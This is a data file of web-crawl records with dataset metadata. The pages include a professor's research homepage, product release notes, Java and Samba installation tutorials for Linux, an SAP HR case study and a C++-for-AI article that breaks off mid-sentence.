immediately, and IIoT-connected machinery can halt any output before it ever becomes a liability. But what about defective machinery? As predictive analytics are engineered to near perfection, machine learning techniques can detect abnormalities and risky indicators long before they cause issues. Yet as cloud-connected, collaborative machines begin managing themselves, what’s to stop fully automated factories operating in the dark or without heat? Potentially nothing. Voodoo Manufacturing is massively disrupting 24/7/365 production with Project Skywalker. Geared with nine mounted 3-D printers and a huge robotic arm, Voodoo’s 3-D printing farms incessantly print parts, and a Universal Robots UR10 arm unloads products as instructed. In the near future, Voodoo estimates that a single-arm will be capable of tending to approximately 100 printers. Diamandis sees a staggering convergence of 3-D printers, collaborative 3-D printing farms, co-robots, robots that manage 3-D printers, 3-D printers that build robots… and this is just the beginning. Smart sensors now convert data, communicate with fabrication machines, and turn off devices when performance or safety is at stake. IIoT allows us to analyze production quotas, do predictive maintenance, and input designs remotely. Although many fear the job market losses caused by purely automated and smart manufacturing, democratized tools and dematerialized companies will allow anyone a shot at invention. This means an upsurge of self-employed, creative minds building needed products; on-demand personalized commodities built at record speed; and an economic boom of unprecedented dimensions. We’ve seen a skyrocketing software industry bringing millions of jobs and brilliant services to our economy. As physical constraints to fabrication disappear and design platforms abound, we are on the verge of a second boom.
systems_science
https://rahman.eng.fiu.edu/
2022-08-20T06:29:56
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573908.30/warc/CC-MAIN-20220820043108-20220820073108-00738.warc.gz
0.922859
2,637
CC-MAIN-2022-33
webtext-fineweb__CC-MAIN-2022-33__0__62282413
en
I am an Assistant Professor in the Department of Electrical and Computer Engineering at Florida International University. I joined FIU in Spring 2019. Before joining FIU, I was an Assistant Professor in the Department of Computer Science at Tennessee Tech University. I obtained a Ph.D. degree in computing and information systems from the University of North Carolina at Charlotte in 2015 under the supervision of Prof. Ehab Al-Shaer. Previously, I received BS and MS degrees in computer science and engineering from Bangladesh University of Engineering and Technology (BUET), Dhaka, in 2004 and 2007, respectively. I lead the Analytics of Cyber Defense (ACyD) Lab at FIU. I am a senior member of IEEE and a member of ACM. You can see my curriculum vitae for further information. Email: marahman [at] fiu [dot] edu Office: EC 3955, Engineering Center My primary research interest covers a wide area of computer networks and communications, within both cyber and cyber-physical systems (CPS)/ Internet of Things (IoT). His research focus primarily includes: - Computer and information security analysis - Control loop security analysis - Risk assessment and security design - Resiliency analysis and hardening - Secure and dependable resource allocation In my research, I primarily apply formal methods, artificial intelligence, and game theory. The students should be comfortable with programming, algorithms, and logic, and received BS/MS with a major in Computer Science/Engineering or Electrical/Communication Engineering. Preferred qualities include scholarly publications, especially in cybersecurity, IoT/CPS, or adversarial machine learning. For further information, please go here. News & Events - [June 2022] I am visiting Griffiss Institute/Air Force Research Lab (AFRL) in Rome, NY on a Visiting Faculty Research Program (VFRP) fellowship. - [May 2022] Our paper titled “Optimal Improvement of Post-Disturbance Dynamic Response in Power Grids” has been accepted for presentation at the IEEE Industry Applications Society Annual Meeting (IASAM) 2022. - [May 2022] Two of our papers titled “DeepCAD: A Stand-alone Deep Neural Network-based Framework for Classification and Anomaly Detection in Smart Healthcare Systems” and “PHASE: Security Analyzer for Next Generation Smart Personalized Smart Healthcare System” have been accepted to be published in the IEEE International Conference on Digital Health (ICDH 2022). The acceptance rate is around 25%. - [April 2022] I have received a $2M Department of Energy (DOE) award to enhance the cybersecurity of America’s energy systems. Along with multiple Co-PIs at FIU, I partnered with collaborators at NCSU, UNC Charlotte, Raytheon Technologies, and Duke Energy in this project. - [April 2022] I hosted a delegation from Bangladesh Energy and Power Research Council (BEPRC) on April 25th, 2022. The team was led by Mr. Satyajit Karmaker, Chairman, BEPRC. - [March 2022] I am serving as the TPC Co-Chair of the IEEE/IFIP Network Operations and Management Symposium (NOMS) 2023, which will be held in Miami. - [March 2022] Our collaborative work titled “A Security Enforcement Framework for SDN Controller using Game Theoretic Approach” has been accepted in IEEE Transactions on Dependable and Secure Computing (TDSC). - [January 2022] Our collaborative work titled “On Algorand Transaction Fee: Challenges and Mechanism Design” has been accepted in the IEEE International Conference on Communications (ICC) 2022. - [December 2021] We have successfully completed the NSF I-Corps program. Congratulations to Entrepreneur Leads Imtiaz and Alvi and Industry Mentor Chris! - [December 2021] Mohamadsaleh Jafari (Saleh) has successfully defended his dissertation titled “Impact-based Analytics of Cascaded False Data Injection Attacks on Smart Grids.” Congratulations to Dr. Jafari! - [October 2021] Our paper titled “Ride-Hailing for Autonomous Vehicles: Hyperledger Fabric-Based Secure and Decentralized Blockchain Platform” is accepted in the IEEE International Conference on Big Data (BigData 2021). - [September 2021] As a Co-PI, I have received a DOE grant titled “Consortium for Research and Education in Power and Energy Systems (CREPES) for Sustainable STEM Workforce.” - [September 2021] As a Co-PI, I have received an NSA grant titled “Automated Risk Detection and Mitigation of Devices and Apps in Smart Settings.” - [August 2021] I have received an NSF I-Corps award for exploring the implementation and commercialization of security analytics for smart healthcare systems. - [August 2021] Our paper titled “iAttackGen: Generative Synthesis of False Data Injection Attacks in Cyber-physical Systems” got accepted to be published in the 9th IEEE Conference on Communications and Network Security (CNS 2021). The acceptance rate is around 28%. - [August 2021] I am serving on the TPC of IEEE Blockchain 2021. - [July 2021] Our paper titled “BIOCAD: Bio-Inspired Optimization for Classification and Anomaly Detection in Digital Healthcare Systems” is accepted to be published in the IEEE International Conference on Digital Health (ICDH 2021). The acceptance rate is around 20%. - [July 2021] I am serving on the TPC of IEEE ICC 2022. - [June 2021] Our paper titled “CURE: Enabling RF Energy Harvesting using Cell-Free Massive MIMO UAVs Assisted by RIS” is accepted to be published in the doctoral track of the IEEE 46th Conference on Local Computer Networks (LCN 2021). - [May 2021] Our paper titled “iDDAF: An Intelligent Deceptive Data Acquisition Framework for Secure Cyber-physical Systems” is accepted to be published in the 17th EAI International Conference on Security and Privacy in Communication Networks (SecureComm 2021). - [May 2021] Our paper titled “REPlanner: Efficient UAV Trajectory-Planning using Economic Reinforcement Learning” is accepted to be published in the 7th IEEE International Conference on Smart Computing (SMARTCOMP 2021). - [April 2021] Our paper titled “BIoTA: Control-Aware Attack Analytics for Building Internet of Things” is accepted to be published in the 18th IEEE International Conference on Sensing, Communication, and Networking (SECON 2021). The acceptance rate is around 26%. Congratulations to Imtiaz! - [April 2021] Our two papers have been accepted to be published in the 45th IEEE Computer Society International Conference on Computers, Software, and Applications (COMPSAC 2021). The acceptance rate is just 27%. The titles of these papers are “DDAF: Deceptive Data Acquisition Framework against Stealthy Attacks in Cyber-Physical Systems” and “Ensemble-based Efficient Anomaly Detection for Smart Building Control Systems.” - [March 2021] Our collaborative paper titled “PrivacyGuard: Enhancing Smart Home User Privacy” is accepted to be published at the ACM/IEEE International Conference on Information Processing in Sensor Networks (IPSN 2021). The acceptance rate is 25%. - [February 2021] Our two papers have been accepted to be published in IEEE PES General Meeting 2021. One of the papers is about false data injection attacks against power system small-signal stability, while another one presents false relay operation attacks in power systems with high renewables. - [February 2021] Our collaborative survey paper titled “A Survey on Security and Privacy Issues in Modern Healthcare Systems: Attacks and Defenses” is accepted to be published in ACM Transactions on Computing for Healthcare. - [January 2021] I am serving on the TPC of IEEE COMPSAC 2021. - [January 2021] Our paper titled “Resiliency-Aware Deployment of SDN in Smart Grid SCADA: A Formal Synthesis Model” has been accepted to be published in IEEE Transactions on Network and Service Management (TNSM). - [January 2021] Our paper titled “Strategic Defense against Stealthy Link Flooding Attacks: A Signaling Game Approach” has been accepted to be published in Transactions on Network Science and Engineering (TNSE). [December 2020] I am serving on the TPCs of the Conference on Blockchain Research & Applications for Innovative Networks and Services (BRAINS) 2021. [December 2020] I am serving as the Program Co-Chair of IEEE STPSA, a workshop in conjunction with IEEE COMPSAC 2021. [December 2020] Shahriar has successfully defended his MS thesis. [August 2020] Our paper on the UAV trajectory design for continuous and resilient surveillance has been accepted in the 25th International Conference on Engineering of Complex Computer Systems (ICECCS 2020). The acceptance rate is 25%. [June 2020] I am serving on the TPC of the IEEE International Conference on Communications (ICC) 2021. [June 2020] I received an REU Supplement ($21,000) on my NSF CRII grant. This grant will be used to support three undergraduate students at FIU to conduct research in CPS/IoT security. [April 2020] A H M Jakaria, my student at Tennessee Tech, has successfully defended his dissertation. Congratulations, Dr. Jakaria! He already accepted and joined Electric Power Research Institute (EPRI), Knoxville, as a Senior Engineer/Scientist. [April 2020] Two papers from my research group have been accepted to be published in the 44th IEEE Computer Society International Conference on Computers, Software, and Applications (COMPSAC 2020). The acceptance rate is just below 24%. The title of these papers are “G-IDS: Generative Adversarial Networks assisted Intrusion Detection System” and “WTC2: Impact-Aware Threat Analysis for Water Treatment Centers.” [March 2020] The paper titled “On Incentive Compatible Role-based Reward Distribution in Algorand” has been accepted to be published in the 50th IEEE/IFIP International Conference on Dependable Systems and Networks (DSN 2020). The acceptance rate is 16.5%. [January 2020] I am serving as a Program Co-Chair of CPS-Sec, a workshop to be held in conjunction with IEEE CNS 2020. [December 2019] I am serving as the Program Co-Chair of IEEE STPSA, a workshop in conjunction with IEEE COMPSAC 2020. [December 2019] Our collaborative work on load balancing for SDN controllers is published in Elsevier Computer Networks. [October 2019] I am serving as a Review Editor of Frontiers in Smart Grids. [August 2019] I am serving as an editor of EAI Transactions on Safety and Security. [July 2019] I have given a talk on invasive and non-invasive analysis of IoT security at IEEE ISVLSI 2019. [June 2019] I am serving on the Program Committee of MILCOM 2019. [May 2019] Our paper titled “A Requirement-Oriented Design of NFV Topology by Formal Synthesis” has been accepted to be published in IEEE Transactions on Network and Service Management (TNSM). [May 2019] I have participated as a speaker in a panel on the “Internet of Things” at IEEE PELS CyberPELS Workshop 2019. [April 2019] ARO provides $10,000 to support ACM WiSec 2019’s travel grant program. [April 2019] Two papers from our group have been accepted to be published in IEEE COMPSAC 2019. [April 2019] Rahat, Ryan, and Brian have successfully defended their MS theses on April 04. Sam also defended his project on the same day. Congratulations to all! [March 2019] Our paper on power system security is accepted/published in Elsevier Computer & Security. [February 2019] I am serving on the Program Committee of IEEE CNSM 2019. [January 2019] I am serving as the Local Chair of ACM WiSec 2019 to be held in Miami from May 15 – 17, 2019.
systems_science
https://www.voloagency.com/google-analytics-4/
2024-02-27T00:28:14
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474669.36/warc/CC-MAIN-20240226225941-20240227015941-00606.warc.gz
0.937235
187
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__189267985
en
In today’s digital landscape, one thing is doubtless, businesses and brands need to navigate new challenges to understand the complex, multi-platform journeys of their clients. So what is different in the new Googles new version of Google Analytics 4 (GA4)? - GA4 makes us of a significantly different data structure and data collection logic - Everything is now built around users and events instead of sessions as it was in the past. - An events-based model processes each user interaction as a standalone event. The last part is significant since we historically used to rely on a session-based model which grouped user interactions within a given time frame. Changing the focus from sessions towards events provides significant benefits to marketers such as cross-platform analysis and further enhanced capacity for pathing analysis. By switching to an event-based model, Google Analytics 4 is even more flexible and better able to predict user behavior.
systems_science
https://swarm-analytics.com/release-of-v2023-2/
2023-09-25T20:27:17
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233510085.26/warc/CC-MAIN-20230925183615-20230925213615-00050.warc.gz
0.914114
985
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__36949460
en
New Classes: E-Scooters and Trams The traffic sector is constantly evolving, and it’s crucial for our technology to keep pace in order to not only ensure our solution’s quality, but also to provide safe and efficient mobility analysis options. The increasing popularity of e-scooters for various reasons has led to their growing prevalence on our streets. By integrating e-scooters as class into our models, we can detect their presence and contribute to improving our product’s quality even further. Additionally, trams are an important form of and vital for public transportation in many cities, reducing individual traffic and improving overall efficiency. By incorporating the tram class into our technology, we are able to analyze tram behavior and contribute to more efficient traffic analysis and management. We are still thrilled to announce the Early Availability of the new hosting service for our Control Center! As already mentioned in our previous mailing, Multi-Tenancy hosting is aimed at providing an even more seamless and efficient experience for your business. Let’s check out how this will be accomplished: Efficient Use of Cloud Resources Our Multi-Tenancy hosting solution ensures the efficient allocation and utilization of cloud resources, resulting in a smooth and fast platform operation. By optimizing resource allocation, we guarantee an enhanced user experience with improved response times, and increased overall system performance. All this ensures that we can maintain our competitive pricing in the future. We understand that different user groups may require varying levels of access and dedicated resources. With our updated Multi-Tenancy hosting, you have the option to request smaller sub-instances, tailoring access and resources to specific user groups. This capability enables you to provide access to your customers to our Swarm Control Center and therefore enables you to resell the Swarm solution more efficiently and scale up without any blocking points. Isolated Data Storage Your data belongs to you and will never be shared. Our multi-tenant hosting architecture ensures that data is stored and managed per sub-instance - so there will be no changes in terms of data separation and control. Each sub-instance benefits from isolated data storage, providing strict data security and privacy. Moreover, this isolated storage enables us to offer our powerful data analytics features specifically tailored to each sub-instance, allowing your customers to gain valuable insights and make data-driven decisions. User and Role Management The user and role management process will be maintained for each sub-instance. This granular user access capability allows you to request different roles for users in different sub-instances. What does this mean for you? We would like to highlight that these enhancements represent just the first step towards an even more effortless and comprehensive update process. In the near future, we will be introducing a staged rollout option, which will further simplify the process of updating your instances. This will ensure a seamless transition and minimize any disruption to your operations during updates, guaranteeing a smooth and uninterrupted experience. The Multi-Tenancy hosting is not a prerequisite for the update to version 2023.2. So we are starting the migration process step by step and we will come back to you with a proposed migration date and coordinate it closely together with you. Administration Interface: Subscription Overview and License Management In the Administration Interface, we introduce license management designed to provide you with a comprehensive overview of your purchased licenses. This interface offers essential information, including order numbers, invoice numbers, and license periods, ensuring efficient management of your licenses. AI models: Traffic Models Stability and Robustness In this release, we have focused on improving model stability and robustness, particularly in varying weather conditions by reworking the augmentations in our model training. On top, the model was improved on a blind spot of dedicated object sizes which have been found in detailed analysis. So you can expect the traffic models to even run more stable and deliver accurate figures. Additionally, we have conducted experiments to provide insights on model accuracy over time in your installations. These advancements ensure reliable performance and increased confidence in our solutions. We are committed to delivering optimal results and look forward to elevating your experience with our enhanced offerings. Virtual Perception License: Time for NVIDIA New Gen As an Early Availability feature, our software now runs on the latest NVIDIA jetpack 5 version. This enables you to run the Swarm Perception Subscription on the new generation of NVIDIA Jetson series (ORIN), so you can process even more streams on one edge device in case of VPX installations. As always: If you have any questions, do not hesitate to contact us at any time. Best regards from Innsbruck, your Swarm Analytics team Last but not least: As usual, we offered an online live demo for this release:
systems_science
http://www.microtech.co.gg/articles.php?item=1192&rss=rss=/mtgsynews.xml
2017-04-24T15:18:17
s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917119637.34/warc/CC-MAIN-20170423031159-00254-ip-10-145-167-34.ec2.internal.warc.gz
0.936588
167
CC-MAIN-2017-17
webtext-fineweb__CC-MAIN-2017-17__0__144900596
en
WALTHAM, MA--(Marketwire - Feb 14, 2012) - CloudFloor DNS, the leading international provider of managed DNS and domain name services, announced that they have greatly improved their NetMon capabilities and have implemented several key back end improvements to benefit customers. These capabilities will greatly reduce failover response and alert time, saving customers valuable time and money. Included in the improvements is a new multi-threaded testing engine deployed on all NetMon nodes. This new testing engine is significantly faster than the old monitoring scripts. A new multi-threaded approach runs many tests simultaneously and now uses a pool of "master" servers to retrieve XML data, detailing tests to be performed instead of a direct database connection. This translates into faster, more resilient, and more efficient performance. Read the entire announcement here.
systems_science
https://nortridgeuserguide.netlify.app/topics/virtual-system-date.html
2021-06-24T06:43:19
s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488551052.94/warc/CC-MAIN-20210624045834-20210624075834-00086.warc.gz
0.723654
143
CC-MAIN-2021-25
webtext-fineweb__CC-MAIN-2021-25__0__64637236
en
Virtual System Date This feature is available in NLS 4.9.3 and later. NoteThis feature is only available to users with admin privileges. Admin users and users with the DBA flag selected can set a virtual system date for testing cycles that may require time travel operations. To access this feature, select File > Virtual System Date. Click Set Virtual System Date then either enter the new date to use or select a new date from the popup calendar. NLS will now use the virtual date as the current date and base all of its calculations and functions on this date. To return to using the actual system date, click Stop Virtual System Date or close the Virtual System Date dialog.
systems_science
http://crr.ugent.be/programs-data/vwr
2017-04-27T09:04:59
s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917122041.70/warc/CC-MAIN-20170423031202-00236-ip-10-145-167-34.ec2.internal.warc.gz
0.924102
230
CC-MAIN-2017-17
webtext-fineweb__CC-MAIN-2017-17__0__37963844
en
Vwr is an R package to assist in computations often needed in visual word recognition research. As the package is listed on CRAN, it can be installed like any other official package from within R. The manual for the package can be found here. Vwr includes functions to: - Compute levenshtein distances between strings - Compute hamming distances (overlap distance) between strings - Compute neighbors based on the levenshtein and hamming distance - Compute Coltheart’s N and average levenshtein distances (e.g., Yarkoni et al’s OLD20 measure). These functions run in parallel on multiple cores and offer a major speed advantage when computing these values for large lists of words. The package also includes the ldknn algorithm, a method that we recently proposed to examine how balanced a lexical decision task is (i.e., how easy it is to discriminate the words from the nonwords in an experiment given no other information than the stimuli in the experiment). A preliminary version of that paper can be found here.
systems_science
http://www.gobeconsultants.com/service/gis-and-data-management/
2019-12-13T10:37:41
s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540553486.23/warc/CC-MAIN-20191213094833-20191213122833-00460.warc.gz
0.906129
162
CC-MAIN-2019-51
webtext-fineweb__CC-MAIN-2019-51__0__55779213
en
Staff are skilled at data visualisation and figure production and often utilise bespoke tools and scripts to efficiently perform complex analysis tasks, such as multicriteria analysis for site selection studies. Along with providing data management services which meet industry standards, GoBe also maintain an extensive library of spatial datasets collated over years of working with both onshore and offshore environmental and survey data. With a thorough understanding of data formats, metadata processes and industry requirements GoBe are able to offer a GIS service which meets the needs of clients involved in a diverse range of projects. Our GIS expertise includes: - Data management - Data processing and conversion - Data visualisation and figure production - Site selection studies - Constraints mapping - Multicriteria analysis - Viewshed analysis
systems_science
https://www.rcmediafreedom.eu/Media-freedom-datasets/Open-Observatory-of-Network-Interference
2023-12-08T09:52:11
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100739.50/warc/CC-MAIN-20231208081124-20231208111124-00746.warc.gz
0.921101
101
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__203825834
en
Since late 2012, OONI has collected millions of network measurements across more than 90 countries around the world, shedding light on multiple cases of network interference. OONI is based on various free software tests which are designed to measure the following: - Blocking of websites - Detection of systems responsible for censorship, surveillance and manipulation - Reachability of Tor, proxies, VPNs, and sensitive domains Data collected by OONI are freely accessible and can be found here. Tags:
systems_science
https://heatingsparesltd.com/index.php?route=information/information&information_id=8
2023-02-06T10:14:00
s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500334.35/warc/CC-MAIN-20230206082428-20230206112428-00299.warc.gz
0.942514
722
CC-MAIN-2023-06
webtext-fineweb__CC-MAIN-2023-06__0__247983075
en
All gas central heating systems using hot water to provide heat produce iron oxides (Magnite) and other debris. It has long been recognised that the presence of these materials within gas central heating systems leads to a drop in heating efficiency and a shorter life for boilers and other components. Carrying out power flushes and adding an inhibitor when a new boiler is fitted are effective ways to minimise this potential problem . Increasingly, fitting a magnetic filtration device to the system is being used to further reduce the risk of on-going damage to central heating systems. Magnetic filters come in two types. Some use magnetic technologies to remove iron oxides only. Others use both magnetic and non-magnetic technologies to remove iron oxides, and non-iron sludge and debris in the water. Manufacturers claim they remove virtually all debris. Typically, magnetic filter devices are fitted to the water return pipe near to the boiler itself. Magnetic filters are relatively non-bulky and are easily fitted to either horizontal or vertical pipework. They have no moving parts and an electrical supply is not required. Filters are available to fit either 22mm or 28mm pipes and they are compatible with most gas domestic and commercial central heating systems. Filters should be emptied annually and this can be done as part of the annual service. Emptying is a simple process which can be completed within a few minutes. Fitting a magnetic filter does not significantly impede the flow of water within the system. They are designed so that the flow of water continues even when the filter becomes full, although when full they no longer effectively remove debris from the water. Magnetic filters also provide a convenient point at which to take water samples or add chemical to the water. Benefits of Magnetic Filters By ensuring that the water in gas central heating systems remains clean, magnetic filters offer a number of potential benefits: The system continues to operate at a high level of efficiency There are no cold spots in the system, for example where a radiator has become clogged with debris The lifetime of the system and its components is maximised There are fewer repairs and breakdowns Carbon emissions are reduced Overall maintenance costs are reduced for landlords and tenants experience lower heating costs There is limited statistical information on these benefits, although one manufacturer claims that their technology can lead to a reduction in heating energy consumption of 6% per year and a 250kg reduction in carbon emissions each year in a typical three bedroom home. When to Fit a Magnetic Filter Whilst there may be some benefits in fitting a magnetic filter to any gas central heating system at any time, the most appropriate time to fit one is when a new boiler or other major components are fitted. In this respect, magnetic filters need to be seen as one part of a more comprehensive approach to reducing the effect of iron oxides and debris in heating systems which includes: A power flush to remove any existing dirt in the system A chemical inhibitor to reduce the build-up of iron oxides, lime scale and other materials within the system A magnetic filter to catch and remove any iron oxide or other debris that forms within the system during its lifetime Magnetic filters cost between around £80 to £140 per unit (unfitted and excluding VAT) depending on the manufacturer. These costs need to be seen in the context of the cost of a new boiler and the potential for using a filter to extend its life, reduce repairs and lower the rapidly increasing heating costs for homeowners.
systems_science
https://rodush.com/2014/08/27/
2017-09-20T00:14:53
s3://commoncrawl/crawl-data/CC-MAIN-2017-39/segments/1505818686077.22/warc/CC-MAIN-20170919235817-20170920015817-00008.warc.gz
0.733256
483
CC-MAIN-2017-39
webtext-fineweb__CC-MAIN-2017-39__0__142139190
en
By default Firefox has no Java plugin because of security issues. One can install plugin by following next steps: 0. Exit Firefox browser if it is running 1. Make directory if it does not exist -> 2. Make a symbolic link for libnpjp2.so file which resides in JRE directory, e.g.: sudo ln -s /usr/lib/jvm/jdk1.8.0_20/jre/lib/amd64/libnpjp2.so /usr/lib/mozilla/plugins/libnpjp2.so Please note, that amd64 is an architecture of the OS you have installed, possibly it could be i386 in your case. 3. Start Firefox and type about:plugins in address box to check if browser able to see Java plugin. This is a YAP (yet another post) about how one can manually install Oracle’s proprietary JDK/JRE version (in Debian 7.0 Wheezy as an example). First of all, download fresh version of JDK/JRE from the Oracle website. Copy archive to desired location, in the following example we will use as an installation source directory. Unpack the archive and run next commands: sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk/bin/java 1071 sudo update-alternatives --install /usr/bin/javac javac /media/mydisk/jdk/javac 1071 sudo update-alternatives --install /usr/bin/jcontrol jcontrol /media/mydisk/jdk/bin/jcontrol 1071 You may need read man pages for update-alternatives to check out the parameters and what they mean. Now, if you want freshly installed version of java/javac to be default in your system, run next commands: sudo update-alternatives --config java sudo update-alternatives --config javac sudo update-alternatives --config jcontrol Follow the instructions issued by update-alternatives to select default version among the list of available installations. After that, check if everything worked fine by issuing commands You should see 1.8.0 for both.
systems_science
https://www.grizzly-hills.com/index.php/2019/11/01/ubuntu-19-10-installing-samba/
2023-10-02T12:21:36
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233510994.61/warc/CC-MAIN-20231002100910-20231002130910-00678.warc.gz
0.777223
579
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__282573414
en
Setting up Samba under Ubuntu 19.10 is relatively easy. This guide will show how to install Samba itself, then configure both a public drive meant to be shared among multiple users, and a per-user drive. NOTE: This guide assumes your linux machine is on your local network. First, install both samba and smbclient: sudo apt install samba smbclient Next, create a directory that will be the shared public drive, and set its ownership: sudo mkdir -p /srv/samba/public sudo chown nobody:nogroup /srv/samba/public sudo chmod 777 /srv/samba/public Now it’s time to configure Samba. There’s two basic things that need to be configured: setting the user security, and adding the public drive. To set the user security, set security = user in the [global] section of Enable the per-user drive in [homes] comment = Home Directories browseable = no read only = no To add the public drive, add this section to the end of [public] comment = Public Files path = /srv/samba/public browsable = yes guest ok = yes read only = no create mask = 0755 Now, restart the Samba services to pick up these configuration changes: sudo systemctl restart smbd.service nmbd.service Since Samba doesn’t use the linux login credentials for a user, you must add each user that needs access to a shared drive using the sudo smbpasswd -a <unix username> Also, if you’re running a firewall on your linux machine, you’ll probably have to allow access for your local network. You can allow specific machines, or a subnet. I use ufw to control my firewall configuration, so for me I simply allowed all access for my internal network: sudo ufw allow from 192.168.0.0/16 To connect to a drive from Windows, I right-click on the Network item in File Explorer and select Map network drive..., and use \\<hostname>\<unix username> as the Folder. To connect to a drive from the Mac, I use Go -> Connect to Server... in the Finder, then use smb://<hostname>/<unix username> as the address.
systems_science
https://atlantconsult.com/experience/reviews/tegeta-motors-hr-system-for-1-5-k-employees-/
2021-11-28T13:57:34
s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964358560.75/warc/CC-MAIN-20211128134516-20211128164516-00457.warc.gz
0.897368
1,060
CC-MAIN-2021-49
webtext-fineweb__CC-MAIN-2021-49__0__135466505
en
Tegeta Motors used an employee management system that didn’t fit all their requirements. The company needed a new multifeatured HR software. Together with AtlantConsult, Tegeta Motors solved the issue by implementing the SAP SuccessFactors. Tegeta Motors is the leading company in the automotive industry of Georgia. The company owns about 50% of the market, importing and selling vehicles (cars, trucks, buses) and auto parts. The supplier represents more than 300 brands, to name a few – Shell, MAN, Toyota, Porshe. 2K wholesale companies 10K B2B clients The human capital management system didn’t have enough functions to support all the business needs. It lacked the following settings: About 1,5 K employees worked at Tegeta Motors. Managers needed a system that would lower working hours spent on extensive data entry to the personnel database. To maintain internal communication, the company required a unified online platform where employee’s positions and contacts are mentioned. - Employee Central that supports core HR processes; - Performance & Goals that helps to align company’s strategy and goals, improve employee performance; - SAP Jam Collaboration - an enterprise social networking solution. Every employee has a personal profile in the system that includes basic information about him (contacts, bio, position, skills, salary account, driver's license, etc.). Personnel completes profiles themselves that streamline HR department work. In the system, users can see the company hierarchy and the structure of each department in accordance with employees’ positions. In Employee Central staff creates requests and addresses them to proper managers or colleagues. It might be an order for equipment or asking for technical support. Previously, employees’ used to send it by email. Now, all requests are processed in the system. The Benefits Management section is designed to administer employee’s insurance applications and other bonuses (corporate car sharing, holiday gifts, pension contributions). To apply for a health insurance, an employee needs to make several clicks and fill in the required data. Earlier, staff used to negotiate it additionally with HR-manager and supervisor. The work of a staff specialist is simplified as well - he collects all applications and sends them to an insurance company. Employee Central helps to track the employee working hours. The system is synchronized with a key card entry system and collects the information when employees come to an office, take breaks and work after hours. The system register when a person works on holiday (according to working schedule). Thus, the employee is automatically granted a compensatory leave for the respective amount of time.The platform keeps track of sick, vacation leaves and other types of absence. The major part of absences employees book in the Employee Central by themselves and then adjust it with managers. They can see the remaining part of vacations. |Performance & Goals| The module enables to run an annual business plan and track the progress of subordinates and managers in goals achieving. Supervisors set goals, tasks and activities for subordinates. The system shows the employee's progress and updates the percent complete. The interface of goals management in the Performance & Goals SAP Jam Collaboration The news feed in the SAP Jam Collaboration In the corporate social network, SAP Jam employees follow the company’s news and comment on it, can keep a professional blog. In the platform, the company’s departments, project teams, corporative learning groups can gather in communities. There is an option to share and adjust documents. The publication of different versions of the file in the SAP Jam Collaboration “SAP Jam is quite helpful to the communication on a project. Team members together edit project documentation and save different versions of files. Generally, vendor SAP recommends carrying out all the project documentation during the implementation of SAP SuccessFactors in SAP Jam Collaboration”, - commented the project leader Pavel Lobach. Additional advantages of the SAP SuccessFactors suite concern mobility and outsourced technical support. A user enters the system through a browser or a mobile app. When an employee is on the way or on a business trip, he is accessible and can utilize key functions of the system. The SuccessFactors suite doesn’t require internal programmers to maintain it. The vendor SAP does it in terms of subscription. HR specialists spend less time on data entering, partly delegating it to employees HR managers keep staff information in the single system The personnel can access the necessary information about colleagues and the structure of the company Employees create and save requests in the one place Executives can set individual goals for each subordinate in accordance with the strategic planning of the company Managers can systematically track employees’ performance The company has a platform for corporate communication SuccessFactors is synchronized with an internal ERP system that enables to use of actual staff information in operational activity Tegeta Motors plans to embed other SAP SuccessFactors modules: Succession Management & Development Planning Compensation & Variable Pay
systems_science
https://blakestarnes.com/how-c-contributes-to-artificial-intelligence-and-machine-learning/
2023-09-29T16:30:03
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233510520.98/warc/CC-MAIN-20230929154432-20230929184432-00453.warc.gz
0.915392
1,210
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__216034109
en
Artificial Intelligence (AI) and Machine Learning (ML) have become integral parts of our daily lives, from voice assistants like Siri and Alexa to recommendation systems on e-commerce platforms. These technologies have revolutionized various industries, including healthcare, finance, and transportation. Behind the scenes, programming languages play a crucial role in developing AI and ML applications. One such language is C++, which offers several features and advantages that contribute to the success of AI and ML. In this article, we will explore how C++ contributes to AI and ML, examining its performance, efficiency, libraries, and integration capabilities. Performance and Efficiency C++ is known for its performance and efficiency, making it an ideal choice for AI and ML applications. Here are some key reasons why C++ excels in this regard: - Low-level programming: C++ allows developers to write code at a low level, giving them fine-grained control over memory management and resource allocation. This level of control is crucial for optimizing AI and ML algorithms, which often involve complex computations and large datasets. - Compiled language: C++ is a compiled language, meaning that the code is translated into machine-readable instructions before execution. This compilation process allows for efficient execution and eliminates the need for interpretation, resulting in faster performance. - Inline assembly: C++ supports inline assembly, which enables developers to write assembly code directly within their C++ programs. This feature is particularly useful for optimizing critical sections of AI and ML algorithms, where performance is crucial. - Efficient memory management: C++ provides manual memory management through features like pointers and dynamic memory allocation. This control over memory allows developers to optimize memory usage, reducing overhead and improving overall performance. Libraries and Frameworks C++ offers a wide range of libraries and frameworks that facilitate AI and ML development. These libraries provide pre-built functions and algorithms, saving developers time and effort. Here are some popular C++ libraries and frameworks used in AI and ML: - OpenCV: OpenCV (Open Source Computer Vision Library) is a powerful library for computer vision tasks, such as image and video processing. It provides a comprehensive set of functions and algorithms, making it a go-to choice for AI applications that involve visual data. - TensorFlow: TensorFlow is a popular open-source ML framework developed by Google. While primarily written in Python, TensorFlow also provides a C++ API, allowing developers to leverage its capabilities in C++ projects. TensorFlow offers a wide range of tools and functions for building and training ML models. - MLpack: MLpack is a scalable C++ machine learning library that provides a collection of algorithms and tools for ML tasks. It focuses on efficiency and ease of use, making it suitable for both research and production environments. - Dlib: Dlib is a C++ library that offers various machine learning algorithms and tools. It is particularly known for its facial recognition 